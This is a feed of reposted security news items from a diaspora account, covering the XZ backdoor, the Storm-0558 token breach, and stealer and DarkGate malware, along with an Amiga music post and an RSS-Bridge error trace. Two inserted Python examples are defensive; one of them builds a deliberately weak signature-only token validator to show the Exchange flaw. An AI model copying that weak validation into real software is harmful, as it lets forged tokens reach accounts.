#1

tresronours@parlote.facil.services

Hackers Claiming Breach of Five Eyes Intelligence Group (FVEY) Documents

A group of hackers has announced the release of sensitive documents purportedly belonging to the Five Eyes Intelligence Group (FVEY), a prominent intelligence alliance comprising Australia, Canada, New Zealand, the United Kingdom, and the United States.

The United States Department of State has launched an investigation into a possible cyber attack after confidential documents, which were reportedly obtained by a malicious actor, were leaked from a government contractor.

Breach Announcement on BreachForums

The announcement was made on a forum known as BreachForums, where a user with the handle “IntelBroker” posted a message to the community.


The post, dated April 2, 2024, claims that the data was obtained by infiltrating Acuity Inc, a company alleged to work closely with the US government and its allies.

According to a recent tweet by HackManac, the alleged security breach at Acuity Inc has resulted in the exposure of highly sensitive intelligence documents belonging to the Five Eyes Intelligence Group (FVEY).

[#DataBreach](https://twitter.com/hashtag/DataBreach?src=hash&ref_src=twsrc%5Etfw) Alert ⚠️ 🇺🇸 [#USA](https://twitter.com/hashtag/USA?src=hash&ref_src=twsrc%5Etfw): Alleged Acuity Inc breach leads to leak of sensitive Five Eyes Intelligence Group (FVEY) documents.

The threat actor group consisting of IntelBroker, Sanggiero, and EnergyWeaponUser claims to have breached Acuity Inc, a federal tech consulting firm,… [pic.twitter.com/qGV8IUmkT7](https://t.co/qGV8IUmkT7)

— HackManac (@H4ckManac), [April 3, 2024](https://twitter.com/H4ckManac/status/1775402497768628236?ref_src=twsrc%5Etfw)

The hackers assert that the breach resulted in acquiring full names, emails, office numbers, personal cell numbers, and government, military, and Pentagon email addresses.

⚠️ [#BREAKING](https://twitter.com/hashtag/BREAKING?src=hash&ref_src=twsrc%5Etfw) ⚠️Allegedly, notorious threat actor IntelBroker, has released National Security Documents and data. Per IntelBroker below.. [#Clearnet](https://twitter.com/hashtag/Clearnet?src=hash&ref_src=twsrc%5Etfw) [#DarkWebInformer](https://twitter.com/hashtag/DarkWebInformer?src=hash&ref_src=twsrc%5Etfw) [#Cyberattack](https://twitter.com/hashtag/Cyberattack?src=hash&ref_src=twsrc%5Etfw) [#Cybercrime](https://twitter.com/hashtag/Cybercrime?src=hash&ref_src=twsrc%5Etfw) [#Infosec](https://twitter.com/hashtag/Infosec?src=hash&ref_src=twsrc%5Etfw) [#CTI](https://twitter.com/hashtag/CTI?src=hash&ref_src=twsrc%5Etfw) [#NSA](https://twitter.com/hashtag/NSA?src=hash&ref_src=twsrc%5Etfw)

Documents belonging to the Five Eyes Intelligence..

Compromised Data:… [pic.twitter.com/I5n41utQN9](https://t.co/I5n41utQN9)

— Dark Web Informer (@DarkWebInformer), [April 2, 2024](https://twitter.com/DarkWebInformer/status/1775295354910466200?ref_src=twsrc%5Etfw)

The compromised data also includes classified information and communications between the Five Eyes countries and their allies.

Implications of the Leak

If confirmed, the leak could have significant implications for national security and the operational integrity of the intelligence-sharing network.

The Five Eyes alliance is known for its collaborative intelligence gathering and analysis efforts, playing a pivotal role in global security operations.

At the time of reporting, there has been no official statement from any of the Five Eyes member countries or Acuity Inc. regarding the authenticity of the leaked documents or the extent of the breach.

The silence from official channels has led to speculation and concern among cybersecurity experts and government officials alike.

Cybersecurity agencies are likely to conduct thorough investigations to ascertain the validity of the claims made by the hackers.

The incident underscores the persistent threat cybercriminals pose to national and international security.


The post Hackers Claiming Breach of Five Eyes Intelligence Group (FVEY) Documents appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Aembit Selected as Finalist for RSA Conference 2024 Innovation Sandbox Contest

The Leading Company for Securing Access Between Workloads Recognized for the Aembit Workload IAM Platform

Aembit, the Workload Identity and Access Management (IAM) Company, has been named one of the Top 10 Finalists for the RSA Conference™ 2024 Innovation Sandbox contest for its platform that manages and secures access between critical software resources, like applications and services.

Aembit will present its technology to a panel of renowned industry judges and a live in-person audience on May 6 at RSA Conference 2024 at the Moscone Center in San Francisco.

Since 2005, the RSAC Innovation Sandbox contest has served as a platform for the most promising young cybersecurity companies to showcase their groundbreaking technologies and compete for the title of “Most Innovative Startup.”

The competition is widely recognized as a catapult for success as the Top 10 Finalists have collectively celebrated more than 80 acquisitions and received $13.5 billion in investments over the last 18 years. Aembit will have three minutes to pitch the panel of judges before a question-and-answer round.

“The submissions for this year’s RSA Conference Innovation Sandbox contest were both dynamic and inspiring. Along with the rest of our entrepreneurial audience, I am excited to see these ideas come to life on stage,” said Linda Gray Martin, senior vice president of RSA Conference. “The evolution of global cyber threats is constant and there’s no better place to look for solutions and to help solve these challenges than in our own community.”

With the rapid expansion of automated software, cloud services, and APIs, enterprises are being met with an exploding number of workloads across their IT environments. Reflect on the now-outdated practice of jotting down user credentials on sticky notes. Similarly, the current method of securing interactions between workloads typically involves the use of static, long-lived credentials, which are prone to theft and often embedded directly within code.

This approach not only introduces security vulnerabilities but also complicates management and impedes prompt response during security incidents and compliance audits. Aembit shifts the model so enterprises can focus on managing access, instead of managing secrets.

“Aembit automates and secures the entire workload-to-workload access workflow, from discovery, to enforcement, to audit – at scale,” said David Goldschlag, co-founder and CEO of Aembit.

“Instead of building another dashboard showing you problems due to secrets and keys, we proactively fix the root cause of these challenges by systematically improving the way workloads are authorized access to your most sensitive resources, without code changes.

You can think of us as Okta (or Azure AD), but between workloads instead of between users and services. The RSA Conference presents the ideal platform for us to demonstrate the significance and impact of our solution to the global security community.”

The RSAC Innovation Sandbox contest kicks off at 10:50 a.m. PT on May 6, and winners will be announced at approximately 1:30 p.m. the same day. The panel of renowned expert judges includes Asheem Chandna, partner at Greylock; Dorit Dor, chief technology officer at Check Point Software Technologies; Niloofar Howe, senior operating partner at Energy Impact Partners; Paul Kocher, independent researcher; and Nasrin Rezai, SVP & CISO at Verizon. Hugh Thompson, RSAC executive chairman and program committee chair of RSA Conference, will return to host the contest.

For more information regarding RSA Conference 2024, taking place at the Moscone Center in San Francisco from May 6 to 9, users can visit https://www.rsaconference.com/usa.

To learn more about the Aembit Workload IAM Platform.

About Aembit

Aembit is the Workload Identity and Access Management platform that secures access between workloads across clouds, SaaS, and data centers. With Aembit’s identity control plane, DevSecOps can fully automate secretless, policy-based, and Zero Trust workload access. For more information, visit www.aembit.io and follow us on LinkedIn.

About RSA Conference

RSA Conference™ is the premier series of global events and year-round learning for the cybersecurity community. RSAC is where the security industry converges to discuss current and future concerns and have access to the experts, unbiased content, and ideas that help enable individuals and companies advance their cybersecurity posture and build stronger and smarter teams.

Both in-person and online, RSAC brings the cybersecurity industry together and empowers the collective “we” to stand against cyberthreats around the world. RSAC is the ultimate marketplace for the latest technologies and hands-on educational opportunities that help industry professionals discover how to make their companies more secure while showcasing the most enterprising, influential, and thought-provoking thinkers and leaders in cybersecurity today. For the most up-to-date news about the cybersecurity industry visit www.rsaconference.com. Where the world talks security.

Contact

CMO

Apurva Dave

Aembit

apurva@aembit.io

The post Aembit Selected as Finalist for RSA Conference 2024 Innovation Sandbox Contest appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

New XZ Utils Backdoor Free Scanner to Detect Malicious Executables

A critical vulnerability has been discovered in XZ Utils, a widely used data compression tool across Unix-like operating systems, including Linux.

This vulnerability, identified as CVE-2024-3094, involves a backdoor that could potentially allow unauthorized remote access, posing a significant threat to software supply chain security.

Zero detection from VirusTotal

The Discovery of CVE-2024-3094

The initial alarm was raised by Andres Freund, who noticed unusual activity in the XZ Utils project. Versions 5.6.0 and 5.6.1 of XZ Utils were found to be compromised.

Shortly after Freund’s warning, the United States government’s Cybersecurity and Infrastructure Security Agency (CISA) and the Open Source Security Foundation (OpenSSF) issued alerts about the critical nature of this backdoor, emphasizing the urgency of addressing this vulnerability due to its potential impact on OpenSSH security.


The revelation of this backdoor is particularly alarming because it represents a nightmare scenario for software supply chain security.

XZ Utils is integral to embedded systems and firmware development across various ecosystems, with the Linux ecosystem being a primary target due to its role in powering modern cloud infrastructure.

The Response and Mitigation Efforts

In response to the discovery of CVE-2024-3094, the community acted swiftly.

Many Linux distributions impacted by the vulnerability have rolled back to a known safe version of XZ Utils, demonstrating the effectiveness of industry-wide, community-driven coordination.

However, the challenge remains in quickly detecting and deactivating deployed backdoored versions in the field.

Traditional detection tools, which often rely on simple version checks, hash-based detection, or YARA rules, have proven inadequate.

These methods can lead to alert fatigue and false positives, overwhelming security teams.

Recognizing the limitations of existing detection methods, the Binary Research Team embarked on a mission to develop a more practical approach to identify the backdoored binaries.

exported by the payload object file

Their investigation revealed the complexity of the XZ Utils backdoor, believed to be part of a sophisticated, state-sponsored operation with multi-year planning.

An essential technique employed by the backdoor involves the GNU Indirect Function (ifunc) attribute, which allows for runtime resolution of indirect function calls.

The backdoor intercepts execution and modifies ifunc calls to insert malicious code.
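As an added illustration (not code from the article or from the scanner it describes), this Python example parses an ELF64 symbol table and lists every symbol of type `STT_GNU_IFUNC` with its resolver address, which are the runtime-resolution points the paragraph above refers to. The sample ELF image and its symbol names are constructed; ifunc use is a legitimate feature, so the output is an inventory for review, not a verdict.

```python
import struct
import sys

EHDR = "<16sHHIQQQIHHHHHH"   # ELF64 file header, little-endian (64 bytes)
SHDR = "<IIQQQQIIQQ"         # ELF64 section header (64 bytes)
SYM = "<IBBHQQ"              # ELF64 symbol table entry (24 bytes)
SHT_SYMTAB, SHT_STRTAB, SHT_DYNSYM = 2, 3, 11
STT_FUNC, STT_GNU_IFUNC = 2, 10


def ifunc_symbols(data: bytes):
    """Return [(name, resolver_address)] for every STT_GNU_IFUNC symbol."""
    if data[:4] != b"\x7fELF" or data[4:6] != b"\x02\x01":
        raise ValueError("expected a little-endian ELF64 file")
    hdr = struct.unpack_from(EHDR, data, 0)
    shoff, shentsize, shnum = hdr[6], hdr[11], hdr[12]
    sections = [struct.unpack_from(SHDR, data, shoff + i * shentsize)
                for i in range(shnum)]
    found = []
    for sec in sections:
        sh_type, offset, size, link, entsize = sec[1], sec[4], sec[5], sec[6], sec[9]
        if sh_type not in (SHT_SYMTAB, SHT_DYNSYM) or entsize == 0:
            continue
        if link >= len(sections):
            raise ValueError("symbol table links to a missing string table")
        str_off, str_size = sections[link][4], sections[link][5]
        strtab = data[str_off:str_off + str_size]
        for pos in range(offset, offset + size, entsize):
            name_off, info, _other, _shndx, value, _size = struct.unpack_from(SYM, data, pos)
            # The low four bits of st_info hold the symbol type.
            if info & 0xF == STT_GNU_IFUNC:
                end = strtab.index(b"\0", name_off)
                # For an ifunc symbol, st_value is the address of the resolver.
                found.append((strtab[name_off:end].decode(), value))
    return found


def build_sample_elf() -> bytes:
    """Constructed minimal ELF64 image: one .dynsym plus its string table."""
    names = [b"", b"sample_crc_fast", b"sample_decode"]  # constructed names
    strtab, offsets = b"", []
    for name in names:
        offsets.append(len(strtab))
        strtab += name + b"\0"
    stb_global = 1 << 4
    syms = struct.pack(SYM, 0, 0, 0, 0, 0, 0)  # mandatory null symbol
    syms += struct.pack(SYM, offsets[1], stb_global | STT_GNU_IFUNC, 0, 1, 0x1200, 0)
    syms += struct.pack(SYM, offsets[2], stb_global | STT_FUNC, 0, 1, 0x1400, 64)
    sym_off = 64                      # symbols start right after the file header
    str_off = sym_off + len(syms)
    shoff = str_off + len(strtab)
    ident = b"\x7fELF\x02\x01\x01" + b"\0" * 9
    ehdr = struct.pack(EHDR, ident, 3, 62, 1, 0, 0, shoff, 0, 64, 0, 0, 64, 3, 0)
    shdrs = struct.pack(SHDR, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    shdrs += struct.pack(SHDR, 0, SHT_DYNSYM, 0, 0, sym_off, len(syms), 2, 1, 8, 24)
    shdrs += struct.pack(SHDR, 0, SHT_STRTAB, 0, 0, str_off, len(strtab), 0, 0, 1, 0)
    return ehdr + syms + strtab + shdrs


if __name__ == "__main__":
    # With a path argument, inspect that file; otherwise use the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as handle:
            image = handle.read()
    else:
        image = build_sample_elf()
    for name, address in ifunc_symbols(image):
        print(f"IFUNC {name} resolver at {address:#x}")
```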

Binary Intelligence technology in action.

This static analysis method can generically detect tampering of control flow graph transitions, significantly reducing the false positive rate.

The discovery of the XZ Utils backdoor underscores the critical importance of software supply chain security.

Through the collaborative efforts of the security community and the innovative solutions provided by teams like Binary, the industry is better equipped to defend against these sophisticated threats.

As the landscape of cyber threats continues to evolve, such proactive measures and tools will be indispensable in safeguarding our digital infrastructure.


The post New XZ Utils Backdoor Free Scanner to Detect Malicious Executables appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Microsoft’s Exchange Server Hack: Key Rotation Flaw Triggers Breach

Storm-0558, a cyberespionage group affiliated with the People’s Republic of China, has reportedly compromised Microsoft Exchange mailboxes of 22 organizations and over 500 individuals between May and June 2023.

This was done using authentication tokens for the accounts, signed by a key held by Microsoft in 2016.

The key was used for secure authentication into remote systems. Because the threat actor possessed it, they obtained several permissions to access any information or systems within that key’s domain.


Additionally, a single key can have enormous power, which, combined with a flaw in Microsoft’s authentication system, resulted in the threat actor gaining full access to any Exchange online account anywhere in the world.

Moreover, Microsoft is still investigating how Storm-0558 got its hands on this key.

The accounts compromised using this attack included

  • Senior United States government representatives working on national security matters

  • Email accounts of Commerce Secretary Gina Raimondo,

  • United States Ambassador to the People’s Republic of China R. Nicholas Burns and

  • Congressman Don Bacon.

Microsoft’s Exchange Server Hack

According to the CSRB reports, during the time the threat actor had access to these sensitive email accounts, they downloaded over 60,000 emails from the State Department.

Attack vector of Storm-0558 (Source: CISA)

The first victim of this intrusion was the State Department, whose SOC team detected anomalies in access to its mail systems on June 15, 2023.

Following this, the next day, there were several security alerts for which they contacted Microsoft.

10-Day Investigations From Microsoft

Microsoft initiated an investigation for the next 10 days and confirmed that the threat actor Storm-0558 had gotten their hands on certain emails through their Outlook Web Access (OWA).

Further, Microsoft also identified 21 different organizations and 500+ users that were impacted by the attack. The impact was further noted by the U.S. government agencies.

In addition to this, Microsoft also found that the threat actor used the OWA for accessing emails directly using tokens which authenticated Storm-0558 as a valid user.

Tokens of this kind must be associated only with Microsoft’s identity systems, but unfortunately, these were not.

Furthermore, the tokens used by the threat actor had digital signatures with a Microsoft Services Account (MSA) cryptographic key that dated back to 2016.

This key was originally intended to be retired by March 2021, providing more insights on the attack.

The Revealing Point

Microsoft initially concluded that the threat actor had forged tokens for accessing these Microsoft Exchange online accounts from affected individuals.

However, after developing some hypotheses, they found a flaw in the token validation logic used by Microsoft Exchange: any consumer key could be used to access enterprise Exchange accounts unless the accounts had code in place to reject consumer keys.

However, it was still not evident enough to prove that the threat actor had obtained and used the 2016 MSA key to compromise the accounts.

By that time, Microsoft recalled an attack performed by the same threat actor in 2021 in which they accessed several documents that were stored in SharePoint as they were looking for information on Azure service management and Identity-related management.

The final stages of investigations revealed some major things: Microsoft had been using manual key rotation mechanisms on enterprise systems and had completely stopped the rotation mechanism after they faced a major outage on one of these activities in 2021.

This allowed the threat actor to use these consumer keys to forge authentication tokens to access consumer email systems.

However, another previously unknown flaw was combined with this issue, potentially compromising sensitive email accounts and organizations.
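The validation gap and the retirement date described above, as an added Python example that is not Microsoft's code: a validator that only checks the signature accepts a consumer-key token for an enterprise mailbox, while the strict one also checks key scope and retirement. The key ids, secrets, scope names and dates are constructed, and HMAC-SHA256 stands in for the real asymmetric signature.

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Constructed key registry: ids, secrets, scopes and dates are sample values.
KEYS = {
    "consumer-2016": {
        "secret": b"constructed-consumer-secret",
        "scope": "consumer",
        "retire_by": datetime(2021, 3, 31, tzinfo=timezone.utc),
    },
    "enterprise-2023": {
        "secret": b"constructed-enterprise-secret",
        "scope": "enterprise",
        "retire_by": datetime(2025, 1, 1, tzinfo=timezone.utc),
    },
}


class TokenRejected(Exception):
    """Raised when a token fails validation."""


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(kid: str, claims: dict) -> str:
    """Sign header.payload with the named key (HMAC as a stand-in signature)."""
    signing_input = _b64(json.dumps({"kid": kid}).encode()) + "." + _b64(json.dumps(claims).encode())
    sig = hmac.new(KEYS[kid]["secret"], signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64(sig)


def _check_signature(token: str):
    """Return (key_record, claims) if the signature verifies, else raise."""
    try:
        head, body, sig = token.split(".")
        key = KEYS[json.loads(_unb64(head))["kid"]]
        presented = _unb64(sig)
        claims = json.loads(_unb64(body))
    except (ValueError, KeyError, TypeError) as exc:
        raise TokenRejected("malformed token or unknown key") from exc
    expected = hmac.new(key["secret"], f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, presented):
        raise TokenRejected("bad signature")
    return key, claims


def validate_signature_only(token: str) -> str:
    """Weak form: any key in the registry is trusted for any resource."""
    _key, claims = _check_signature(token)
    return claims["sub"]


def validate_strict(token: str, resource_scope: str, now: datetime) -> str:
    """Hardened form: key scope must match the resource and the key must be live."""
    key, claims = _check_signature(token)
    if key["scope"] != resource_scope:
        raise TokenRejected(f"{key['scope']} key used for {resource_scope} resource")
    if now > key["retire_by"]:
        raise TokenRejected("signing key is past its retirement date")
    return claims["sub"]


if __name__ == "__main__":
    now = datetime(2023, 6, 15, tzinfo=timezone.utc)
    # Constructed token: consumer key, enterprise mailbox as the subject.
    token = issue_token("consumer-2016", {"sub": "user@enterprise.example"})
    print("signature-only validator accepts:", validate_signature_only(token))
    try:
        validate_strict(token, "enterprise", now)
    except TokenRejected as reason:
        print("strict validator rejects:", reason)
```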

The post Microsoft’s Exchange Server Hack: Key Rotation Flaw Triggers Breach appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

bliter@diaspora-fr.org

#Amiga #Music: TwentyTwentyFour #Compilation #1 - #off1k

top

G'day peeps, been a little while since the last proper compilation and so begins 2024 of Amiga goodness. This compilation consists of #tunes released at #Gerp24 and #Revision24 #Demo #Parties from the last 2 months or so.
Some killer #tracks among this lot so hope you all enjoy :)

Recorded from a Real Amiga 1200 (2MB Chip, 32MB Fast, 030@40Mhz, 16GB CFHD)

TRACKLIST
01 - [00:00] LMan - Ode To Amiga
02 - [02:43] Interphace - Peace Droid
03 - [05:56] Jogeir Liljedahl - Roguecraft
04 - [10:02] SoDa7 - Coffee at Morning
05 - [13:10] JosSs^Mygg^Bonefish - Dan Dan Dada
06 - [17:18] Kefka - The Återsmällare
07 - [19:37] Facet - NewSong
08 - [21:11] Laamaa - Saint Lager
09 - [23:34] AceMan - Yoru no Koe
10 - [27:26] Triace - Groove Operator
11 - [30:49] H0ffman^Daytripper - Surveillance
12 - [34:19] Virtua Point Zero - Can Your AI Do This
13 - [37:52] Tecon - Spiceballs
14 - [41:18] Ma2e^No-XS^Dya - Brink It Back To Me
15 - [44:48] Teo - The Flow
16 - [48:04] Subi - Space Is The Place

The Amiga is a series of #computers released by C=ommodore from 1985 to 1993, all Amigas used the same sound chip, an 8bit, 4channel, upto 28khz PCM called "Paula".

HARDWARE USED:
#Amiga1200, #Behringer DJX750 Mixer, Behringer HD400 Hum Eliminator, Sony 14" PVM, Various RCA and TRS cables, Hydra Mini Scart Switch, Various Scart and BNC cables.
A Phone to record the footage (wish it had 50fps).
**Stereo joining is done with hardware (RCA & TRS cables, Mixer)
Approximate 15% Stereo Separation.

SOFTWARE USED:
#Protracker 2.3F (Amiga)
#Audacity 3.1.3 - audio recording, minor cable noise reduction, volume leveling, some fade outs.
#Camtasia 2021 - video editing, song info.
#Handbrake 1.5.1 - video compression.

https://www.youtube.com/watch?v=RCbYLjWDBf0
#music #musique

tresronours@parlote.facil.services

Jackson County Missouri Ransomware Attack Impacts IT Systems

Jackson County, Missouri, has become the latest victim of a ransomware attack, which has caused substantial disruptions within its Information Technology (IT) systems.

This attack has highlighted the vulnerabilities in digital infrastructures and the cascading effects such disruptions can have on public services and operations.

The first signs of the cyberattack emerged as operational inconsistencies across Jackson County’s digital infrastructure.

Specific systems were found to be inoperative, while others continued to function normally.

The affected systems are critical to the county’s daily operations, including tax payments and online services for property searches, marriage licenses, and inmate searches.

Consequently, the Assessment, Collection, and Recorder of Deeds offices at all counties have been forced to close until further notice, significantly impacting residents and county operations.

Services Unaffected

It is noteworthy that the Kansas City Board of Elections and Jackson County Board of Elections have not been impacted by this system outage.


This detail is crucial, especially during electoral activities, ensuring the democratic process remains uninterrupted.

Response and Actions Taken

Upon detecting the disruptions, Jackson County promptly notified law enforcement and engaged IT security contractors to assist in the investigation and remediation efforts.

The county has emphasized that the integrity of its digital network and the confidentiality of resident data remain top priorities.

To date, no evidence suggests that any data has been compromised.

The investigation is in its early stages, with cybersecurity partners working closely with the county to diagnose the issue.

While ransomware is considered a potential cause, comprehensive analyses are underway to confirm the exact nature of the disruption.

Immediate measures have been taken to secure the systems against further compromise.

The county’s IT teams are working tirelessly to restore total operational capacity to the impacted services.

Community Impact and Ongoing Efforts

The closure of critical county offices has undeniably affected residents, who rely on these services for various legal and administrative needs.

Jackson County has acknowledged the inconvenience caused by these closures and expressed appreciation for the community’s patience and understanding.

As the situation unfolds, Jackson County is committed to providing timely updates and ensuring transparency with its residents.

The focus remains on swiftly resolving the issue and implementing measures to prevent future attacks.

This incident is a stark reminder of the ever-present threat of cyberattacks and the importance of robust cybersecurity measures.

As Jackson County navigates this challenging time, the lessons learned will undoubtedly strengthen its defenses and preparedness for similar incidents in the future.


The post Jackson County Missouri Ransomware Attack Impacts IT Systems appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

arteplus7@social.yl.ms

RSS-Bridge

See https://curl.haxx.se/libcurl/c/libcurl-errors.html for description of the curl error code.

Details

Type: HttpException
Code: 0
Message: cURL error Could not resolve host: api.arte.tv: 6 (https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://api.arte.tv/api/opa/v3/videos?limit=15&language=de
File: lib/http.php
Line: 154

Trace

#0 index.php(72): RssBridge->main()
#1 lib/RssBridge.php(103): DisplayAction->execute()
#2 actions/DisplayAction.php(68): DisplayAction->createResponse()
#3 actions/DisplayAction.php(117): Arte7Bridge->collectData()
#4 bridges/Arte7Bridge.php(128): getContents()
#5 lib/contents.php(83): CurlHttpClient->request()
#6 lib/http.php(154)

Context

Query: action=display&bridge=Arte7&context=Category&lang=de&cat=&sort_by=&sort_direction=DESC&format=Mrss
Version: 2024-02-02
OS: Linux
PHP: 7.4.33


tresronours@parlote.facil.services

Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies

A new menace has emerged that targets personal information with alarming precision.

Dubbed the “Mighty Stealer,” this malicious software is designed to infiltrate devices and extract a wide range of sensitive data.

The Mighty Stealer is a sophisticated malware that boasts an easy-to-use graphical user interface (GUI), allowing cybercriminals to deploy it with minimal effort.

The software’s capabilities are extensive, including the theft of cookies, passwords, and wallet information.

It can also capture Discord tokens, Telegram profiles, and webcam pictures without the user’s consent.

The interface of the Mighty Stealer, as seen in the provided images, is sleek and user-friendly, disguising its nefarious purposes behind a facade of legitimacy.

The software’s logo, featuring a stylized bird, is a deceptive symbol of the power and control it grants to its unauthorized users.


According to a recent tweet by ThreatMon, a threat actor has announced the release of a new tool called Mighty Stealer.

🚨 Mighty Stealer Announced

A threat actor announces Mighty Stealer. Stealer captures cookies, passwords, wallets, discord tokens, telegram profiles, webcam pictures, games, user/pc information, desktop snaps, etc.

[#MightyStealer](https://twitter.com/hashtag/MightyStealer?src=hash&ref_src=twsrc%5Etfw) [#Malware](https://twitter.com/hashtag/Malware?src=hash&ref_src=twsrc%5Etfw) [#Darkweb](https://twitter.com/hashtag/Darkweb?src=hash&ref_src=twsrc%5Etfw) [#ThreatIntelligence](https://twitter.com/hashtag/ThreatIntelligence?src=hash&ref_src=twsrc%5Etfw) [pic.twitter.com/1qVdhMO0UF](https://t.co/1qVdhMO0UF)

— ThreatMon (@MonThreat), [April 2, 2024](https://twitter.com/MonThreat/status/1775149045767385371?ref_src=twsrc%5Etfw)

Stealth and Evasion Techniques

One of the most concerning aspects of the Mighty Stealer is its ability to evade detection.

It includes features that prevent it from being discovered by antivirus programs and can operate undetected in virtual machine environments.

The malware can also hide its presence on the infected device, making it even harder for users to realize they’ve been compromised.

The Risks of Mighty Stealer

The risks associated with the Mighty Stealer are significant.

By capturing cookies, the malware can bypass login procedures and access online accounts. Stolen passwords and wallet information can lead to financial loss and identity theft.

The unauthorized access to webcam feeds poses a severe privacy violation, potentially leading to blackmail and other forms of exploitation.

To safeguard against threats like the Mighty Stealer, it is crucial to maintain up-to-date antivirus software and to be cautious when downloading and installing new programs.

Users should also regularly change their passwords and enable two-factor authentication where possible to add an extra layer of security.

The emergence of the Mighty Stealer malware is a stark reminder of the importance of cybersecurity vigilance.

With its array of stealthy data theft capabilities, it represents a significant threat to personal privacy and security.

Users must proactively protect their devices and personal information from such invasive software.


The post Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies

A new menace has emerged that targets personal information with alarming precision.

Dubbed the “Mighty Stealer,” this malicious software is designed to infiltrate devices and extract a wide range of sensitive data.

The Mighty Stealer is a sophisticated malware that boasts an easy-to-use graphical user interface (GUI), allowing cybercriminals to deploy it with minimal effort.

The software’s capabilities are extensive, including the theft of cookies, passwords, and wallet information.

It can also capture Discord tokens, Telegram profiles, and webcam pictures without the user’s consent.

The interface of the Mighty Stealer, as seen in the provided images, is sleek and user-friendly, disguising its nefarious purposes behind a facade of legitimacy.

The software’s logo, featuring a stylized bird, is a deceptive symbol of the power and control it grants to its unauthorized users.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

According to a recent tweet by TweetMon, a threat actor has announced the release of a new tool called Mighty Stealer.

🚨 Mighty Stealer Announced

A threat actor announces Mighty Stealer. Stealer captures cookies, passwords, wallets, discord tokens, telegram profiles, webcam pictures, games, user/pc information, desktop snaps, etc.

[

#MightyStealer

](https://twitter.com/hashtag/MightyStealer?src=hash&ref_src=twsrc%5Etfw)

[

#Malware

](https://twitter.com/hashtag/Malware?src=hash&ref_src=twsrc%5Etfw)

[

#Darkweb

](https://twitter.com/hashtag/Darkweb?src=hash&ref_src=twsrc%5Etfw)

[

#ThreatIntelligence

](https://twitter.com/hashtag/ThreatIntelligence?src=hash&ref_src=twsrc%5Etfw)

[

pic.twitter.com/1qVdhMO0UF

](https://t.co/1qVdhMO0UF)

— ThreatMon (@MonThreat)

[

April 2, 2024

](https://twitter.com/MonThreat/status/1775149045767385371?ref_src=twsrc%5Etfw)

Stealth and Evasion Techniques

One of the most concerning aspects of the Mighty Stealer is its ability to evade detection.

It includes features that prevent it from being discovered by antivirus programs and can operate undetected in virtual machine environments.

The malware can also hide its presence on the infected device, making it even harder for users to realize they’ve been compromised.

The Risks of Mighty Stealer

The risks associated with the Mighty Stealer are significant.

The malware can bypass login procedures and access online accounts by capturing cookies. Striking passwords and wallet information can lead to financial loss and identity theft.

The unauthorized access to webcam feeds poses a severe privacy violation, potentially leading to blackmail and other forms of exploitation.

To safeguard against threats like the Mighty Stealer, it is crucial to maintain up-to-date antivirus software and to be cautious when downloading and installing new programs.

Users should also regularly change their passwords and enable two-factor authentication where possible to add an extra layer of security.

The emergence of the Mighty Stealer malware is a stark reminder of the importance of cybersecurity vigilance.

With its array of stealthy data theft capabilities, it represents a significant threat to personal privacy and security.

Users must proactively protect their devices and personal information from such invasive software.

The post Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams

DarkGate loader delivery surged after the Qakbot takedown, with financially motivated actors like TA577 and ransomware groups (BianLian, Black Basta) using it to target financial institutions (US, Europe) for double extortion.

It establishes an initial foothold and deploys info-stealers, ransomware, and remote access tools to maximize data exfiltration and extortion gains by utilizing legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution.

Overview of DarkGate version 5 activity

Similarities with IcedID delivery methods suggest that threat actors may be cooperating or sharing their tradecraft.

DarkGate is a malware-as-a-service advertised in June 2023 that offers remote access, data theft, and privilege escalation, and uses multiple techniques to evade detection, including a custom crypter, polymorphism, and anti-VM.

Persona RastaFarEye is advertising DarkGate on a cybercrime forum.

It also utilizes LOLBAS tools to download a malicious AutoIt script that decrypts the DarkGate payload, injects it into a process, and establishes persistence through registry keys and a rootkit module.

DarkGate infection chain through PDF lure.

Attackers primarily target financial institutions like BDK, a major German bank, using phishing emails with lures relevant to the target’s industry and delivering the DarkGate payload through embedded links in PDF attachments.

The delivered malicious PDF attachment targeted the BDK.

The links redirect victims to download pages hosted on compromised websites.

To evade detection, DarkGate operators have incorporated innovative techniques like abusing DNS TXT records to execute malicious Windows commands that download and install the malware.

Malware delivery similarities between DarkGate and IcedID.

EclecticIQ analysts compared DarkGate and IcedID malware, finding shared tactics like obfuscated strings, using PING.exe to check internet connectivity, CURL.exe for downloading payloads, and decoy PDF documents.

They differed in execution tools (DarkGate: Cscript.exe, IcedID: Rundll32.exe) and payload types (DarkGate: VBS script, IcedID: disguised DLL).

Showing the example of DoubleClick Ad service abuse.

For DarkGate delivery, attackers abused open redirects in Google’s DoubleClick ads with emails containing links disguised as invoices.

